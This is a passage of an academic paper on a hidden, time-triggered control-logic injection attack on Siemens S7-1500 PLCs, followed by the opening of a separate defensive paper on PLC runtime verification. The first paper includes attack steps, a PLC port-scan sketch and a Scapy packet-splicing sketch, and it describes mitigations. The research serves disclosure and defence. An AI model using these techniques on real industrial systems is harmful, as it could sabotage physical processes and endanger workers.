To conduct a real-world attack scenario, as in TRITON [12] and the Ukraine power grid attack [13], we suppose that an adversary already has access to the control network. Attackers can gain such access via a typical IT attack, e.g., an infected USB stick, or a typical social engineering attack, e.g., a phishing attack. To make our attack more challenging, we also assume that the adversary has no access to the engineering software, and can only record the network traffic between the PLC and the engineering software using a packet-sniffing tool such as Wireshark (https://www.wireshark.org/).

B. Attacker's goal
The attacker aims at confusing the control logic of a victim PLC at a time when he is disconnected from the target and its network, i.e. he is completely offline at the point zero of the attack. Furthermore, the infection must remain concealed as long as the interrupt condition is not met, i.e. until the very moment determined by the attacker. In other words, the infection must not be revealed in the time between infecting the PLC and the attack launch date.

C. Attack Scenario
In this paper, we conduct the attack approach presented in figure 1. Taking into consideration the assumptions mentioned earlier, our attack consists of two main phases as follows:
Fig. 1: Attack Scenario
1) Infecting the PLC: in this phase, the attacker patches the control logic program with a malicious block, precisely with the Time-of-Day (ToD) interrupt block, using Organization Block 10 (OB10). This phase functions online, i.e. once the attacker has gained access to the target PLC. Please note that throughout this phase, the infection is hidden and kept in idle mode to meet the second attacker goal.
2) Triggering the infection: the attacker triggers the malicious block at a date and time of his choosing. This phase functions offline, i.e. without the need to be connected to the PLC/network at the point zero of the attack.
The rest of this work is organized as follows. Section II provides related works. Section III presents an overview of the latest S7CommPlus protocol version. In section IV, our experimental setup is shown, followed by the description of our attack approach in section V.
Section VI assesses and discusses the impact of our attack, and then suggests some possible mitigation methods against such a threat. Finally, we conclude our work in section VII.

II. RELATED WORK
The best-known attack representing a typical control logic injection attack is the one that targeted the Iranian nuclear facility in 2010, namely Stuxnet [10]. More recent real-world attacks occurred in Ukraine [13], [15], and in Germany [17]. However, in the following, we overview the recent related academic works.
In 2015, Klick et al. [4] introduced a malicious injection into the program running in a SIMATIC PLC, without confusing the execution process of the user-program. In a follow-up work, Spenneberg et al. [5] published a PLC worm. The infection approach presented in their work spreads internally from one PLC to another. A Ladder Logic Bomb malware, written in ladder logic or one of the high-level programming languages, was introduced in [6]. This malware was injected by an adversary into a control logic program running in an exposed PLC. In 2021, researchers in [2] showed that S7-300 PLCs are vulnerable to control modification attacks and demonstrated that confusing a physical process controlled by an infected PLC is feasible. After compromising the security measures, the authors conducted an injection attack and successfully managed to keep their infection hidden from the engineering software. Their concealment approach is based on engaging a fake PLC impersonating a real, uninfected PLC. The authors of [31] overcame the anti-replay mechanism used in the newer S7 PLC models, and showed that a skilled adversary could craft valid captured packets to make malicious changes to the control logic program. The authors of Rogue7 [19] introduced a rogue engineering station that can operate as the engineering software towards the PLC and inject any malicious code the attacker wishes. By understanding how cryptographic messages were transferred between the parties, they hid their infection in the PLC's memory.
All the mentioned attacks were quite limited, and required adversaries to be connected to the PLC at the point zero of the attack. Thus, the possibility of being detected by the ICS operators or the implemented security means is high. To overcome the existing limitations in the previous works, we introduced a novel attack approach based on injecting PLCs with an interrupt code, precisely with a Time-Of-Day block [8]. The malicious block used in our attack aims at interrupting the execution process of the program at a certain time the attacker sets. Our experimental results proved the concept that an adversary could manipulate the control process even if he is not connected to the target PLC. Despite the fact that our attack approach was only conducted on an S7-300 PLC and designed to force the PLC to switch off, the attack was efficient and could confuse the execution sequence of the program running in the victim PLC. Such attacks are quite severe, as infected PLCs keep executing the original program appropriately, i.e. without being confused/interrupted, for hours, days, weeks, months and even years, until the very moment at which the adversary wants his attack to trigger.
However, the only realistic way to reveal our approach was when the ICS supervisor requested the control logic from the PLC and compared the online and offline codes, running in the infected device and stored on the engineering station respectively. We overcome this challenge as shown later.

III. S7COMMPLUSV3 PROTOCOL
The latest S7 protocol version, namely S7CommPlusV3 [18], is utilized in the newer versions of the Totally Integrated Automation (TIA) Portal, i.e. from V13 on, and also in the newer CPU S7-1500 firmware, e.g. V1.8, V2.0, etc. The newest S7 protocol was developed to include a sophisticated integrity method and is considered the most secure protocol compared to the prior versions, e.g. S7CommPlusV1 and S7CommPlusV2. It provides various operations, e.g. Start, Stop, Download, Upload, etc., that are first translated to S7CommPlus messages by the TIA Portal, and then transmitted to the PLC. Figure 2 shows the structure of a regular S7CommPlusV3 message.
Fig. 2: The structure of an S7CommPlusV3 message
After the PLC receives the messages, it acts by executing the control operations required by the user, and then responds back to the engineering software accordingly. These messages are transferred in sessions, each with a unique ID chosen by the PLC. Figure 3 depicts the packet order in a communication session via the S7CommPlusV3 protocol. As shown, each session begins with a handshake comprising four messages. The cryptographic attributes, as well as the protocol version and keys, are selected over those four messages. After a successful handshake, all packets are integrity-protected using a very sophisticated cryptographic protection mechanism. Please note that explaining the encryption process, or extracting the encrypted keys used in this protocol, is out of the scope of this paper. However, [16], [19], [32] provide sufficient technical information about the integrity protection method that the newest version of the S7 protocol uses.
The S7CommPlus protocol functions in a request-response manner. Each request packet contains a request header and a request set. The header contains a function code that identifies the required operation, e.g. 0x31 for a download message, as shown in figure 4.
Fig. 3: Messages exchanged in an S7 session via S7CommPlusV3
Fig. 4: S7CommPlus Download Request - Objects and Attributes
Furthermore, each message contains multiple objects that are composed of attributes. All the objects as well as the attributes are identified using unique class identifiers. For instance, the CreateObject request, sent by the engineering software to the PLC over an S7CommPlus download message, builds a new object in the PLC memory with a unique ID (in our given example, 0x04ca). The download packet therefore generates an object of class ProgramCycleOB. This created object is composed of multiple attributes, each with specific values dedicated to a certain aim, as follows [32]:
- Object MAC: denoted by the item value ID Block.AdditionalMac and used as an additional Message Authentication Code (MAC) value in the encryption/integrity process.
- Object Code: denoted by the item value ID FunctionalObject.code. It is the binary executable code that the PLC reads and processes.
- Source Code: denoted by the item value ID Block.BodyDescription.
It is equivalent to the program written by the ICS operator; it is stored in the PLC and can later be uploaded, upon request, to a TIA Portal project.

IV. EXPERIMENTAL SET-UP
To test the approach presented in this paper, we used a Fischertechnik training factory (https://www.fischertechnikwebshop.com/de-DE/fischertechnik-lernfabrik-4-0-24v-komplettset-mit-sps-s7-1500-560840-de-de), as seen in figure 5. Please note that this setup has already been used in earlier experiments, i.e. the following description is very similar to the one in our former publication [32].
Fig. 5: Experimental Set-up
The factory comprises five industrial modules: vacuum suction gripper (VGR), high-bay warehouse (HBW), multi-processing station with kiln (MPO), sorting line with color recognition (SLD), and environment station with surveillance camera (SSC). The entire system is controlled by a SIMATIC S7-1512SP with firmware V2.9.2, and programmed with TIA Portal V16. The PLC connects to a TXT controller (https://www.fischertechnik.de/en/service/elearning/playing/txt-controller) via an IoT gateway. The TXT controller serves as a Message Queuing Telemetry Transport (MQTT) broker and as an interface to the fischertechnik cloud.
The factory we used in our experiments provides two industrial processes: storing and ordering materials. The default process cycle begins with storing and identifying the material, i.e. the workpiece. The factory has an integrated NFC tag sensor storing production data that can be read out via an RFID/NFC module. This allows the user to trace the workpieces digitally. The cloud displays the part's colour and its ID number. Afterwards, the vacuum gripper applies suction to the material and transports it to the high-bay warehouse, which applies a first-in first-out principle for the outsourcing. All goods that were stored can be ordered again online using a dashboard. The desired product and the corresponding color are selected by the user, and then placed in the shopping cart. The suction gripper passes the workpiece on from one step to the next, and then moves back to the sorting system once the production is complete. The sorting system receives the allocation command as soon as the color sorter detects the proper color. The material is sorted using pneumatic cylinders. Finally, the production data is written on the material at the end of the production process, and the finished product is provided for collection.

V. ATTACK DESCRIPTION
Our approach introduced in this work consists of two phases: infecting the PLC (online phase), and triggering the interrupt block (offline phase). Please note that obtaining the IP and MAC address, as well as the model of the victim PLC, is out of the scope of this paper, and can be achieved by applying a PN-DCP protocol based scanner [36], an S7CommPlus scanner [37], or any other network scanner; a simple illustrative sketch of such a scan is given after the step list below. In the next two subsections, we illustrate our attack approach in detail.

A. Infecting the PLC (Online Phase)
Here, we aim at patching the victim with malicious commands inserted in OB10. For this purpose, we utilize a developed man-in-the-middle (MITM) station that contains two components:
- TIA Portal software: to bring back and modify the actual program that the victim device runs.
- PLCinjector tool: to patch the PLC with the adversary's malicious code.
Our infection phase comprises four steps as follows:
1) reading and writing the user-program;
2) altering and updating the user-program;
3) concealing the malicious infection;
4) transferring the crafted S7 messages.
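As noted above, locating the victim PLC is left to existing scanners and is not part of our contribution. The following minimal Python sketch is only an illustration of the idea and an assumption on our part (it is not the PN-DCP or S7CommPlus scanners cited above): it sweeps a hypothetical subnet for hosts that accept connections on TCP port 102, the ISO-on-TCP port commonly used for S7 communication.

```python
# Illustrative sketch only (not the cited scanners): find hosts on a subnet
# that accept TCP connections on port 102, i.e. candidate S7 devices.
import socket
from ipaddress import ip_network

SUBNET = "192.168.0.0/24"   # hypothetical control-network range
S7_PORT = 102               # ISO-on-TCP port used by S7 communication

def is_s7_candidate(host: str, timeout: float = 0.3) -> bool:
    """Return True if the host accepts a TCP connection on port 102."""
    try:
        with socket.create_connection((host, S7_PORT), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    for addr in ip_network(SUBNET).hosts():
        if is_s7_candidate(str(addr)):
            print(f"possible S7 device at {addr}")
```

A positive hit only indicates an open port; identifying the exact CPU model would still require one of the protocol-aware scanners referenced above.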
1) Reading & Writing the user-program: After gaining access to the control network, we need to steal the user-program that the victim device is programmed with. Figure 6 describes this step. As shown, we launch the attacker's TIA Portal and establish a connection directly with the target PLC. Due to a security gap in the design of the newest S7 PLCs, i.e. the S7-1500 series, we were able to communicate with the victim device using an unauthorized TIA Portal installation. To be precise, the S7-1500 PLC does not implement any security mechanisms or checking procedures to ensure that the presently connected TIA Portal software is the same one that the PLC communicated with in a previous communication session [32]. This vulnerability allows any adversary who has the TIA Portal software installed on his machine to communicate with S7 PLCs without any effort. After the communication is successfully established, we retrieve the user-program into the attacker's TIA Portal by sending an upload command. Afterwards, we download it again to the target and record the entire S7CommPlus packet flow transmitted between the attacker's machine and the victim PLC using the Wireshark software. Eventually, the adversary has the user-program in his own TIA Portal, and all the captured messages dedicated to the download command are saved in a Pcap file for further use in the next steps.
Fig. 6: Upload, download, and record the user-program
2) Altering & Updating the user-program: After we retrieve the user-program, the unauthorized TIA Portal displays it in the high-level programming language that it was originally programmed in (e.g. Structured Control Language, SCL). By understanding the control process driven by the victim PLC, we can configure malicious instructions that manipulate certain outputs or inputs in the target system, e.g., we can force a certain output to turn off when the interrupt block is triggered. This is done as follows. We add to the current user-program a new OB with the specific event class Time-of-Day, and then enter the name of the block, the desired programming language (e.g. SCL), and the number of the assigned organization block, i.e. 10. After that, we program the block with the attacker's commands to be executed when the interrupt occurs. [30] provides all the technical details to configure and program Time-of-Day interrupts in S7-1500 PLCs. In spite of the fact that our malicious code differs from the original one only by an extra small block (OB10), it is sufficient to disturb the control process of our experimental set-up, as shown later in the next section. The easiest way to infect the PLC is to write the modified program directly to the PLC using the attacker's TIA Portal. This allows the attacker to transfer his program (the original code with the new interrupt block OB10) into the victim PLC without any effort. After the PLC receives the attacker's program, it updates its program successfully without knowing that it is connected to a non-authorized TIA Portal.
3) Concealing the malicious infection: Downloading the attacker's program into the PLC using the attacker's TIA Portal comes with a challenge.
The legitimate user can easily disclose the infection by requesting the control logic from the patched device, and comparing the offline program that is saved on the legitimate engineering station, i.e. the TIA Portal, with the online program running on the remote PLC (similar to how the infection in [8] was revealed). To overcome this challenge, we need to conceal the infection from the ICS operator by transferring the attacker's code over a crafted S7CommPlus download message. Siemens provides its S7-1500 PLCs with a precaution procedure that double-checks the freshness of each session. Thus, the PLC can reveal potential manipulations and refuses to update its program in case the attributes of the ProgramCycleOB object do not have the same session ID, i.e. do not belong to the same session. This procedure is part of a very complex anti-replay mechanism that Siemens uses to protect its newest PLC line from replay attacks. However, our observations showed that the PLC does not check the integrity of all the attributes transferred over the S7CommPlus protocol as expected. Specifically, the PLC checks only certain integrity bytes that are contained in the bytecode of the Object MAC and Object Code attributes, whilst the Source Code does not carry those integrity bytes, or any other bytes dedicated to security purposes. Consequently, we can conclude that the Source Code attribute is not integrity-checked by the PLC, and attackers could maliciously replace this attribute with another one taken from an already pre-recorded S7CommPlus message. Thus, using Scapy (https://scapy.net/), a powerful packet manipulation program written in Python that supports sniffing and replaying packets, network scanning, tracerouting, etc., we can craft the attacker's S7CommPlus download message by substituting the Source Code attribute of the ProgramCycleOB object of the malicious program with the Source Code attribute of the ProgramCycleOB object of the original user-program. Figure 7 depicts this method.
Fig. 7: Crafting the S7CommPlus download message
In such a scenario, whenever the ICS supervisor requests the control logic from the infected PLC, it responds by sending the ProgramCycleOB object stored in its memory. The TIA Portal then decompiles the Source Code attribute, which eventually represents the original user-program, not the attacker's program. This method deceives the ICS operator by always showing him the original user-program, whilst the PLC executes a different one.
4) Transferring the crafted S7 message: Our crafted download packet comprises the following attributes: the Object MAC and Object Code attributes of the malicious program, and the Source Code attribute of the original user-program. To push the message into the target PLC, we used our PLCinjector tool published in [32]. The tool is dedicated to injecting S7-1500 PLCs and has two functions. The first function is employed to compromise the two integrity protection modules that S7CommPlusV3 utilizes, i.e. the pre-fragment message protection and the session key exchange protocol. The second function is based on Scapy, and is used to send the adversary's download packet to the PLC after the proper modifications to the session ID and certain integrity fields of the S7 message are done.
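To make the attribute substitution concrete, the following is a minimal, hypothetical Scapy sketch; it is not the PLCinjector tool. It splices the bytes of the original program's Source Code (Block.BodyDescription) attribute into a previously recorded malicious download frame. Since stock Scapy has no S7CommPlus dissector, the byte offsets of the attribute are placeholders that would have to be located beforehand, e.g. with the Wireshark dissector, and the session ID and integrity fields would still need the additional fixes described above.

```python
# Hypothetical sketch of the Source Code substitution (not the PLCinjector tool).
# Assumptions: two recorded downloads exist as pcap files, and the byte range of
# the Block.BodyDescription ("Source Code") attribute has been located manually.
from scapy.all import rdpcap, wrpcap, Raw, TCP

MALICIOUS_PCAP = "malicious_download.pcap"   # attacker's recorded download
ORIGINAL_PCAP = "original_download.pcap"     # legitimate recorded download
SRC_CODE_SPAN = (0x120, 0x5a0)               # placeholder offsets of the attribute

def tcp_payload(pkt) -> bytes:
    """Raw TCP payload of a frame, or empty bytes if there is none."""
    return bytes(pkt[Raw].load) if pkt.haslayer(TCP) and pkt.haslayer(Raw) else b""

malicious = rdpcap(MALICIOUS_PCAP)
original = rdpcap(ORIGINAL_PCAP)

# Pick the download request frames; here simply the largest payload in each trace.
m_idx = max(range(len(malicious)), key=lambda i: len(tcp_payload(malicious[i])))
o_idx = max(range(len(original)), key=lambda i: len(tcp_payload(original[i])))

start, end = SRC_CODE_SPAN
crafted = bytearray(tcp_payload(malicious[m_idx]))
crafted[start:end] = tcp_payload(original[o_idx])[start:end]  # swap in the original source

malicious[m_idx][Raw].load = bytes(crafted)
del malicious[m_idx][TCP].chksum              # let Scapy recompute the checksum on write
wrpcap("crafted_download.pcap", malicious)    # injection/replay would follow separately
```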
It is worth mentioning that our PLCinjector tool could also be used on all S7-1500 PLCs sharing the same firmware, as Siemens has designed the new S7 key exchange mechanism under the strong assumption that all PLCs with the same firmware version also utilize the same public-private key mechanism [19].

B. Triggering phase (Offline)
After we inject our malicious program into the target PLC, we go offline and close the current live session with the victim and its network. The malicious program is executed starting with the next execution cycle, and the CPU checks the interrupt condition in each execution cycle. Our patch remains in idle mode, unobserved in the PLC's memory, until the interrupt condition is met, i.e., once the date set by the attacker matches the date of the CPU, the interrupt is triggered, and the malicious instructions in block OB10 are then processed. In our experimental setup, we programmed OB10 to force particular motors to switch off at a specific time and date when we are disconnected from the control network.

VI. RESULTS, EVALUATION, AND MITIGATION
In this section, we show the results of implementing the attack scenario presented in the former section, and evaluate the service disruption of the control process due to our patch. After that, we discuss our experimental results and suggest some possible mitigation methods to protect industrial systems from such a serious attack.

A. Results
To achieve convincing results, we conducted five attack scenarios on the industrial modules of our Fischertechnik factory. In the following, we explain only one scenario in detail, as the other scenarios are performed in the same way. The first attack scenario aims at confusing the VGR module. This module operates using 8 motors as follows: vertical motor up (%Q2.0), vertical motor down (%Q2.1), horizontal motor backwards (%Q2.2), horizontal motor forwards (%Q2.3), turn motor clockwise (%Q2.4), turn motor anti-clockwise (%Q2.5), compressor (%Q2.6), and valve vacuum (%Q2.7). These 8 motors (PLC outputs) are assigned to specific parameters in a data block named QX_VGR and used in the control logic program as: QX_VGR_M1_VerticalAaxisUp_Q1, QX_VGR_M1_VerticalAaxisDown_Q2, QX_VGR_M2_HorizontalAxisBackward_Q3, QX_VGR_M2_HorizontalAxisForward_Q4, QX_VGR_M3_RotateClockWise_Q5, QX_VGR_M3_RotateCounterclockwise_Q6, QX_VGR_Compressor_Q7, and QX_VGR_ValveVacuum_Q8, respectively. To confuse the VGR module, we inserted our OB10 with specific commands to switch all 8 motors off at the point zero of the attack. Afterwards, we patched the PLC following the four steps explained in section V. Our results showed that we successfully managed to update the PLC's program without recording any physical impact in the time between patching the PLC and the very moment determined for the attack, i.e. the workpiece kept moving normally between the industrial modules. Once the clock of the victim CPU matched the time and date that we had configured, we observed that the VGR module stopped moving. Moreover, the workpiece being carried by the gripper fell down. This is due to the fact that the compressor that provides the appropriate airflow to transport the good was switched off. This led to an inappropriate operation, and the movement sequence of the workpieces was successfully confused. In a real-world plant, e.g. in the automobile manufacturing industry, such a disturbance might be significantly catastrophic and could even cost human lives.
We extracted the outputs linked to the PLC in the same way for the other modules, i.e. HBW, MPO, SLD, and SSC, and then programmed the interrupt block OB10 to force the corresponding outputs to switch off when the interrupt block is activated. Our results showed that the PLC always updates its program, and we could successfully keep the interrupt block for each infection in idle mode until the very moment determined by us.
Fig. 8: Boxplot presenting the measured execution cycle times of OB1 for five attack scenarios

B. Evaluation
Siemens PLCs, by default, store the time of the last execution cycle in a local variable of OB1 called OB1_PREV_CYCLE [8]. Therefore, to accurately evaluate the disturbance caused by our patches on the control process, we added a small SCL code snippet to our user-program that stores the last cycle time in a separate data block. Afterwards, we recorded as many as 4096 execution cycles for each scenario, calculated the arithmetic mean value, and eventually used the Kruskal-Wallis and Dunn's multiple comparison tests for statistical analysis. All our experimental results are shown in figure 8.
Our results show that the mean time for executing OB1 under the first infection (i.e. attacking the VGR module) is approx. 38 milliseconds (ms), and differs only slightly from the mean time for executing OB1 with the original user-program (baseline), which is almost 36 ms. The execution cycle time when we attacked the HBW module also rose slightly: we recorded a mean value of 37 ms. Our patch dedicated to attacking the MPO module introduced a mean cycle time of 40 ms, whilst the highest value recorded in our experiments occurred when we patched the control logic with an OB10 dedicated to confusing the SLD module; there the mean value rose to 46 ms. Patching the control logic with an OB10 to disrupt the functionality of the SSC module did not show a noticeable difference in executing OB1; the mean value we registered was 37 ms. From all this, we can conclude that checking the interrupt condition of our malicious block (OB10) in each execution cycle does not impact the execution process of the PLC's program, and the Fischertechnik system keeps operating normally. In order to conceal our infection successfully, we need to take into consideration that executing the malicious program should not exceed the overall maximum execution time of 150 ms [8]. However, all our infections are unlikely to trigger this timeout, as they are quite small compared to 150 ms. Furthermore, the sizes of the OB10 blocks used in our infections were quite small (roughly between 6 and 9 KB). Therefore, our attack approach will most likely not exceed the free space available in the PLC's memory to store the extra malicious block that the attacker patches.

C. Mitigation
An appropriate recommendation we strongly suggest is to fix the integrity mechanism issues in the S7-1500 PLCs that our investigations found. The new, improved mechanism must include two-way group authentication between the PLCs and the TIA Portal software. On the other hand, we also understand that such a fundamental solution needs a while to be implemented, as it comes at a high cost and may have side-effects. Moreover, industrial components have a longer life-cycle than common IT devices.
Thus, we believe that PLCs may not be updated in time. As a result, exposed devices will continue to operate in real-world industrial environments. In this respect, a proper immediate solution could be to integrate network detection into the existing ICS settings. For instance, control logic detection [23] and verification [28], [29] can be employed to alleviate the current situation. As our infections were concealed inside the PLC, precisely in its memory, partitioning the memory space and enforcing memory access control [24] could also be a convenient solution. Other solutions would be implementing a digital signature for control messages such as control logic downloads; network monitoring tools like SNORT [25], ArpAlert [26], and ArpWatchNG [27] for disclosing any threat involving a MITM approach; and a security mechanism to scan and double-check the protocol header that contains critical data about the type of the payload. All these suggestions are recommended to detect and block any potential unauthorized transmission of the control logic.

VII. CONCLUSION
This paper extended our attack approach introduced in [8] to cover the newest SIMATIC PLC line. Based on the design vulnerabilities in S7-1500 PLCs, we performed a sophisticated injection attack scenario that infects an exposed PLC with a Time-of-Day block (OB10). The malicious interrupt block allows attackers to trigger the patch at a certain time and date, and eventually to disturb the industrial process without being connected to either the PLC or its network at the point zero of the attack. Our investigations proved the concept that the original control logic program is always displayed on the legitimate TIA Portal, whilst the infected PLC runs another program. On the other hand, our malicious program does not exceed the overall maximum execution time of 150 ms. Hence, the industrial process is not interrupted/disturbed while the patch is in idle mode. For all that, the malicious infection will not be detected even if the ICS supervisor re-activates the security means before re-operating the system. Finally, we provided some possible security recommendations to secure ICS environments from such a severe threat.

REFERENCES
[1] H. Wardak, S. Zhioua and A. Almulhem, "PLC access control: a security analysis," 2016 World Congress on Industrial Control Systems Security (WCICSS), 2016, pp. 1-6, doi: 10.1109/WCICSS.2016.7882935.
[2] W. Alsabbagh and P. Langendörfer, "A Stealth Program Injection Attack against S7-300 PLCs," 2021 22nd IEEE International Conference on Industrial Technology (ICIT), 2021, pp. 986-993, doi: 10.1109/ICIT46573.2021.9453483.
[3] D. Beresford, "Exploiting Siemens Simatic S7 PLCs," Black Hat USA, 2011.
[4] J. Klick, S. Lau, D. Marzin, J.-O. Malchow and V. Roth, "Internet-facing PLCs as a network backdoor," 2015 IEEE Conference on Communications and Network Security (CNS), 2015, pp. 524-532, doi: 10.1109/CNS.2015.7346865.
[5] A. Spenneberg, M. Brüggemann and H. Schwartke, "PLC-blaster: A worm living solely in the PLC," Black Hat Asia, Marina Bay Sands, 2016.
[6] N. Govil, A. Agrawal and N. O. Tippenhauer, "On Ladder Logic Bombs in Industrial Control Systems," January 2018.
[7] K. Sushma, A. Nehal, Y. Hyunguk and A. Irfan, "CLIK on PLCs! Attacking Control Logic with Decompilation and Virtual PLC," 2019.
[8] W. Alsabbagh and P.
Langendörfer, "Patch Now and Attack Later - Exploiting S7 PLCs by Time-Of-Day Block," 2021 4th IEEE International Conference on Industrial Cyber-Physical Systems (ICPS), 2021, pp. 144-151, doi: 10.1109/ICPS49255.2021.9468226.
[9] W. Alsabbagh and P. Langendörfer, "A Control Injection Attack against S7 PLCs - Manipulating the Decompiled Code," IECON 2021 - 47th Annual Conference of the IEEE Industrial Electronics Society, 2021, pp. 1-8, doi: 10.1109/IECON48115.2021.9589721.
[10] N. Falliere, "Exploring Stuxnet's PLC infection process," Sept. 2010.
[11] Y. Hyunguk and A. Irfan, "Control Logic Injection Attacks on Industrial Control Systems," 2019, doi: 10.1007/978-3-030-22312-0_3.
[12] "Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure," https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html, [Online; accessed 12-April-2021].
[13] R. M. Lee, M. J. Assante, and T. Conway, "Analysis of the cyber-attack on the Ukrainian power grid," Technical report, SANS E-ISAC, March 18, 2016. Available at: https://ics.sans.org/media/ESAC_SANS_Ukraine_DUC_5.pdf.
[14] S. Senthivel et al., "Denial of Engineering Operations Attacks in Industrial Control Systems," Proceedings of the Eighth ACM Conference on Data and Application Security and Privacy, March 2018, pp. 319-329, https://doi.org/10.1145/3176258.3176319.
[15] G. Liang, S. R. Weller, J. Zhao, F. Luo, and Z. Y. Dong, "The 2015 Ukraine blackout: Implications for false data injection attacks," IEEE Transactions on Power Systems, 2016, doi: 10.1109/TPWRS.2016.2631891.
[16] F. Weißberg, "Analyse des Protokolls S7CommPlus im Hinblick auf verwendete Kryptographie," March 26, 2018. Available at: https://www.os-s.net/publications/thesis/Bachelor_Thesis_Weissberg.pdf
[17] T. De Maizière, "Die Lage der IT-Sicherheit in Deutschland 2014," The German Federal Office for Information Security, 2014. Available at: https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2014.pdf.
[18] T. Wiens, S7comm Wireshark dissector plugin, January 2014. Available at: http://sourceforge.net/projects/s7commwireshark.
[19] E. Biham, S. Bitan, A. Carmel, A. Dankner, U. Malin, and A. Wool, "Rogue7: Rogue Engineering-Station attacks on S7 Simatic PLCs," Black Hat USA 2019, 2019.
[20] C. Lei, L. Donghong, and M. Liang, "The spear to break the security wall of S7CommPlus," Black Hat USA 2017, 2017.
[21] H. Hui and K. McLaughlin, "Investigating Current PLC Security Issues Regarding Siemens S7 Communications and TIA Portal," doi: 10.14236/ewic/ICS2018.8.
[22] A. Ayub, H. Yoo and I. Ahmed, "Empirical Study of PLC Authentication Protocols in Industrial Control Systems," 2021 IEEE Security and Privacy Workshops (SPW), 2021, pp. 383-397, doi: 10.1109/SPW53761.2021.00058.
[23] H. Yoo, S. Kalle, J. Smith, and I. Ahmed, "Overshadow PLC to Detect Remote Control-Logic Injection Attacks," in International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment, Springer, 2019, pp. 109-132.
[24] C. H. Kim et al., "Securing Real-Time Microcontroller Systems through Customized Memory View Switching," 2018, doi: 10.14722/ndss.2018.23117.
[25] M. Roesch et al., "Snort: Lightweight intrusion detection for networks," in LISA, vol. 99, no. 1, 1999, pp. 229-238.
[26] ArpAlert, https://www.arpalert.org/arpalert.html, [Online; accessed 15-March-2021].
[27] arpwatch, https://en.wikipedia.org/wiki/Arpwatch, [Online; accessed 15-March-2021].
[28] S. Zonouz, J. Rrushi, and S. McLaughlin, "Detecting industrial control malware using automated PLC code analytics," IEEE Security & Privacy, vol. 12, no. 6, pp. 40-47, 2014.
[29] M. Zhang, C.-Y. Chen, B.-C. Kao, Y. Qamsane, Y. Shao, Y. Lin, E. Shi, S. Mohan, K. Barton, J. Moyne et al., "Towards automated safety vetting of PLC code in real-world plants," in 2019 IEEE Symposium on Security and Privacy (SP), IEEE, 2019, pp. 522-538.
[30] https://support.industry.siemens.com/cs/document/109773506/simatic-step-7-basic-professional-v16-and-simatic-wincc-v16?dti=0&lc=en-WW
[31] H. Hui, K. McLaughlin, and S. Sezer, "Vulnerability analysis of S7 PLCs: Manipulating the security mechanism," International Journal of Critical Infrastructure Protection, Volume 35, 2021, 100470, ISSN 1874-5482, https://doi.org/10.1016/j.ijcip.2021.100470.
[32] W. Alsabbagh and P. Langendörfer, "A New Injection Threat on S7-1500 PLCs - Disrupting the Physical Process Offline," in IEEE Open Journal of the Industrial Electronics Society, doi: 10.1109/OJIES.2022.3151528.
[33] https://ipcsautomation.com/blog-post/market-share-of-different-plcs/
[34] https://roboticsandautomationnews.com/2020/07/15/top-20-programmable-logic-controller-manufacturers/33153/
[35] https://www.statista.com/statistics/897201/global-plc-market-share-by-manufacturer/
[36] W. Alsabbagh and P. Langendörfer, "A Remote Attack Tool Against Siemens S7-300 Controllers: A Practical Report," Kommunikation und Bildverarbeitung in der Automation, Technologien für die intelligente Automation 14, doi: 10.1007/978-3-662-64283-2_1.
[37] https://github.com/Mknea/dippasofta/blob/master/S7CommPlusScanner.py
Detecting_PLC_control_corruption_via_on-device_runtime_verification.pdf
With an increased emphasis on the cyber-physical security of safety-critical industrial control systems, programmable logic controllers have been targeted by both security researchers and attackers as critical assets. Security and verification solutions have been proposed and/or implemented either externally or with limited computational power. Online verification or intrusion detection solutions are typically difficult to implement within the control logic of the programmable logic controller due to the strict timing requirements and limited resources. Recently, there has been increased advancement in open controller systems, where programmable logic controllers are coupled with embedded hypervisors running operating systems with much more computational power. Development environments are provided that allow developers to directly integrate library function calls from the embedded hypervisor into the program scan cycle of the programmable logic controller. In this paper, we leverage these coupled environments to implement online cyber-physical verification solutions directly integrated into the program scan cycle, as well as online intrusion detection systems within the embedded hypervisor. This novel approach allows advanced security and verification solutions to be directly enforced from within the programmable logic controller program scan cycle. We evaluate the proposed solutions on a commercial-off-the-shelf Siemens product.

I. INTRODUCTION
The security of Programmable Logic Controllers (PLCs) is increasingly becoming a vital issue in securing industrial control systems (ICS). There is an inherent difficulty in integrating security into these PLCs, as they are intended to be simple computing machines whose programs can be easily verified against the underlying physical systems they control. Adding advanced security tools can compromise the time-sensitive operations as well as any general temporal attributes of the cyber-physical system.
The security of PLCs continues to receive an increased amount of attention in the wake of ICS-targeted malware. ICS-CERT reports that in FY 2015 [1], they responded to 295 reported incidents involving critical infrastructure in the United States. Most programming and operator commands are sent using insecure proprietary network protocols. Not only have proprietary protocols been reverse engineered, but open-source APIs [2] have been released that allow programmers to develop invasive tools that can be used with malicious intent, such as PLCInject [3]. Additionally, open-source packet dissectors have been developed for network protocol analyzers. The reverse engineering of certain proprietary protocols has resulted in new protocols being developed with encrypted communication. Although these protocols can provide secure communication for the latest products, they are typically only supported by later devices, while legacy devices remain vulnerable to packet injection attacks.
Offline security solutions such as TSV [4] and [5] have been proposed as bump-in-the-wire verification mechanisms sitting between the operator/programmer interface and the PLC. These solutions have provided the ability to verify the programs downloaded to the PLC against temporal safety properties. Furthermore, models have been proposed for offline analysis of periodic traffic to and from a PLC [6].
These solutions were typically provided as external solutions, where more advanced processing systems are coupled with the PLC system to verify the programming inputs of the PLC. This allows for advanced operations that require an abundance of memory, such as the calculation of advanced physical properties of a system or the processing of network traffic.
Modular embedded controllers introduced the concept of coupling a PLC with an embedded hypervisor. The hypervisors are typically much more advanced embedded operating systems than the actual PLC. APIs are provided for developing programs that can be directly integrated into the programming blocks of the PLC, either synchronously or asynchronously, through shared memory between the PLC and the hypervisor. Development environments are provided to generate programming blocks that can call an associated library function on the hypervisor, e.g., a DLL file on a Windows hypervisor, allowing the PLC to pass inputs to and take outputs from the library function within the main PLC scan cycle [7].
In this paper, we leverage these coupled environments to implement online security solutions directly integrated into the PLC. We first provide a novel approach to implementing a cyber-physical verification solution directly integrated into the scan cycle of the PLC, using the embedded hypervisor to perform advanced calculations of the underlying physical system. We then present an online monitoring solution that provides an IDS based on the aforementioned security models of periodic PLC traffic.
